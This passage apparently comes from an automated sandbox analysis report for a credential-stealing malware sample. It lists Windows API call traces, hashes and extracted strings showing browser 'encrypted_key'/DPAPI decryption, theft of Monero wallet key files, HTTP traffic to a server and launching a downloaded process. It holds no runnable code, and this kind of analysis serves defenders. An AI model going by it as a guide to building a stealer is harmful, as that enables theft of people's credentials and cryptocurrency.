                      • Part of subcall function 040A9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 040A9FA0
                      • Part of subcall function 040A9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 040A9FF9
                      • Part of subcall function 040A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                      • Part of subcall function 040A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                      • Part of subcall function 040A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                      • Part of subcall function 040A9C27: ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                      • Part of subcall function 040A9C27: LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                      • Part of subcall function 040A9C27: CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                      • Part of subcall function 040B9627: GlobalAlloc.KERNEL32(00000000,040B4644,040B4644), ref: 040B963A
                    • StrStrA.SHLWAPI(?,0064A0D8), ref: 040B465A
                    • GlobalFree.KERNEL32(?), ref: 040B4779
                      • Part of subcall function 040A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D56
                      • Part of subcall function 040A9D27: LocalAlloc.KERNEL32(00000040,?,?,?,040A5155,00000000,?), ref: 040A9D68
                      • Part of subcall function 040A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D91
                      • Part of subcall function 040A9D27: LocalFree.KERNEL32(?,?,?,?,040A5155,00000000,?), ref: 040A9DA6
                      • Part of subcall function 040AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                    • lstrcat.KERNEL32(?,00000000), ref: 040B470A
                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 040B4727
                    • lstrcat.KERNEL32(00000000,00000000), ref: 040B4739
                    • lstrcat.KERNEL32(00000000,?), ref: 040B474C
                    • lstrcat.KERNEL32(00000000,00420FB8), ref: 040B475B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 1191620704-0
                    • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                    • Instruction ID: a068f4b7a22d437a125a5e5fe81f3d781979cebf948d4579297844b040241142
                    • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                    • Instruction Fuzzy Hash: 267164B6A00218BBDB14FBF0DC45FEE73B9AF48304F008598E645A6180DA75EB55CF95
                    APIs
                    • memset.MSVCRT ref: 0041429E
                    • memset.MSVCRT ref: 004142B5
                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                    • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                    • lstrcatA.KERNEL32(?,024EBE10), ref: 0041430B
                    • lstrcatA.KERNEL32(?,?), ref: 0041431F
                    • lstrcatA.KERNEL32(?,024EBBE8), ref: 00414333
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                      • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                      • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                      • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                    • StrStrA.SHLWAPI(?,024ECB90), ref: 004143F3
                    • GlobalFree.KERNEL32(?), ref: 00414512
                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                    • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                    • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                    • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                    • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 1191620704-0
                    • Opcode ID: 35dc9abe077a93c729557fad744a15183afba98a1ba7520b66c4d280a3250323
                    • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                    • Opcode Fuzzy Hash: 35dc9abe077a93c729557fad744a15183afba98a1ba7520b66c4d280a3250323
                    • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                    APIs
                    • memset.MSVCRT ref: 00401327
                      • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                      • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                      • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                      • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                      • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                    • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                    • lstrlenA.KERNEL32(?), ref: 0040135C
                    • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024B9798,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                    • memset.MSVCRT ref: 00401516
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 1930502592-218353709
                    • Opcode ID: 2b826a0f646ba4068e1c47d902010c813df356d60d5a4c6e57d199a22263e09a
                    • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                    • Opcode Fuzzy Hash: 2b826a0f646ba4068e1c47d902010c813df356d60d5a4c6e57d199a22263e09a
                    • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
                    APIs
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,024E9120), ref: 00406303
                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,024ECDB8,00000000,00000000,00400100,00000000), ref: 00406385
                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                    • lstrlenA.KERNEL32(00000000), ref: 0041532F
                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                    • lstrlenA.KERNEL32(00000000), ref: 00415383
                    • strtok.MSVCRT(00000000,?), ref: 0041539E
                    • lstrlenA.KERNEL32(00000000), ref: 004153AE
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3532888709-1526165396
                    • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                    • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                    • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                    • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                    APIs
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                    • StrCmpCA.SHLWAPI(?,024E9120), ref: 00406147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                    • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                    • InternetCloseHandle.WININET(a+A), ref: 00406253
                    • InternetCloseHandle.WININET(00000000), ref: 00406260
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID: a+A$a+A
                    • API String ID: 4287319946-2847607090
                    • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                    • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                    • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                    • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • memset.MSVCRT ref: 040B0E83
                    • lstrcat.KERNEL32(?,00000000), ref: 040B0E9C
                    • lstrcat.KERNEL32(?,00420D7C), ref: 040B0EAE
                    • lstrcat.KERNEL32(?,00000000), ref: 040B0EC4
                    • lstrcat.KERNEL32(?,00420D80), ref: 040B0ED6
                    • lstrcat.KERNEL32(?,00000000), ref: 040B0EEF
                    • lstrcat.KERNEL32(?,00420D84), ref: 040B0F01
                    • lstrlen.KERNEL32(?), ref: 040B0F0E
                    • memset.MSVCRT ref: 040B0F34
                    • memset.MSVCRT ref: 040B0F48
                      • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                      • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                      • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,040B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 040B9948
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 040B0FC1
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 040B0FCD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                    • String ID:
                    • API String ID: 1395395982-0
                    • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                    • Instruction ID: 8b250215d151303b35db52350da2266e2793440c281466e31ccc09d8ffc54540
                    • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                    • Instruction Fuzzy Hash: ED8170B5610218ABDB14EBA0DD51FEE7379AF4420CF404199A34676091EF747B88CFAD
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • memset.MSVCRT ref: 040B0E83
                    • lstrcat.KERNEL32(?,00000000), ref: 040B0E9C
                    • lstrcat.KERNEL32(?,00420D7C), ref: 040B0EAE
                    • lstrcat.KERNEL32(?,00000000), ref: 040B0EC4
                    • lstrcat.KERNEL32(?,00420D80), ref: 040B0ED6
                    • lstrcat.KERNEL32(?,00000000), ref: 040B0EEF
                    • lstrcat.KERNEL32(?,00420D84), ref: 040B0F01
                    • lstrlen.KERNEL32(?), ref: 040B0F0E
                    • memset.MSVCRT ref: 040B0F34
                    • memset.MSVCRT ref: 040B0F48
                      • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                      • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                      • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,040B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 040B9948
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 040B0FC1
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 040B0FCD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                    • String ID:
                    • API String ID: 1395395982-0
                    • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                    • Instruction ID: 5565df0a60d927569ca8db978aaecda62d55b25ab0ff58ba0b578a22d2ae54fd
                    • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                    • Instruction Fuzzy Hash: 49618FB5610218ABDB24EBA0DD45FEE7738AF4430CF404199A74676091EB747B88CFAD
                    APIs
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                      • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                      • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 040A4B7C
                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A4BA1
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A4D21
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 040A504F
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 040A506B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 040A507F
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 040A50B0
                    • InternetCloseHandle.WININET(00000000), ref: 040A5114
                    • InternetCloseHandle.WININET(00000000), ref: 040A512C
                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A4D7C
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                    • InternetCloseHandle.WININET(00000000), ref: 040A5136
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID:
                    • API String ID: 2402878923-0
                    • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                    • Instruction ID: ad987374b5055c592662f49d3f080e080717921be529aceb2b6d0998f48fed2d
                    • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                    • Instruction Fuzzy Hash: 58123F72A10218ABEB15EB94DD90FEEB379BF14308F504199A14672091EF743F88CFA5
                    APIs
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                      • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                      • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 040A6548
                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A656A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A659C
                    • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A65EC
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 040A6626
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 040A6638
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 040A6664
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 040A66D4
                    • InternetCloseHandle.WININET(00000000), ref: 040A6756
                    • InternetCloseHandle.WININET(00000000), ref: 040A6760
                    • InternetCloseHandle.WININET(00000000), ref: 040A676A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID:
                    • API String ID: 3074848878-0
                    • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                    • Instruction ID: 7e22a3d87c12983121780b17b36de42691523c7a3f1b50cf3889075a1a4cc556
                    • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                    • Instruction Fuzzy Hash: C6718C75A00218ABEB24DFE0CC48FEE77B5EB04704F148198E14ABB190DBB57A84CF91
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 040B92D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID:
                    • API String ID: 2244384528-0
                    • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                    • Instruction ID: 6b16a37cccff49962315bd6a98712a3bd1f55fd9ec973b9e65a2f877f7999376
                    • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
